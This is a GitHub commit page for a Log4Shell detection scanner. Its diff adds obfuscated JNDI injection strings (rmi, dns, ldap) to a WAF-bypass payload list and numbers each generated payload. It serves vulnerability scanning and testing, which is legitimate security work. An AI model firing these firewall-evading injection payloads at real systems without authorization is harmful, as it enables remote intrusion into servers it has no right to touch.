Skip to content

Commit

Permalink
Merge pull request fullhunt#88 from zsecducna/master
Browse files Browse the repository at this point in the history 
Update waf bypasses and payload counter
  • Loading branch information
@mazen160
mazen160 authored Dec 25, 2021
2 parents 59d2c2f + 23564b7 commit f2f1105
Showing 1 changed file with 6 additions and 1 deletion.
7 changes: 6 additions & 1 deletion log4j-scan.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -52,11 +52,14 @@

waf_bypass_payloads = ["${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{{callback_host}}/{{random}}}",
"${${::-j}ndi:rmi://{{callback_host}}/{{random}}}",
"${jndi:rmi://{{callback_host}}/{{random}}}",
"${jndi:rmi://{{callback_host}}}/",
"${${lower:jndi}:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/{{random}}}",
"${jndi:dns://{{callback_host}}/{{random}}}",
"${jnd${123%25ff:-${123%25ff:-i:}}ldap://{{callback_host}}/{{random}}}",
"${jndi:dns://{{callback_host}}}",
"${jndi:${lower:l}${lower:d}a${lower:p}://{{callback_host}}}",
"${jnd${upper:i}:ldap://{{callback_host}}/{{random}}}",
Expand Down Expand Up @@ -167,9 +170,11 @@ def get_fuzzing_post_data(payload):

def generate_waf_bypass_payloads(callback_host, random_string):
payloads = []
count = 0
for i in waf_bypass_payloads:
count = count + 1
new_payload = i.replace("{{callback_host}}", callback_host)
new_payload = new_payload.replace("{{random}}", random_string)
new_payload = new_payload.replace("{{random}}", f'{random_string}_{count}')
payloads.append(new_payload)
return payloads

Expand Down

0 comments on commit f2f1105

Please sign in to comment.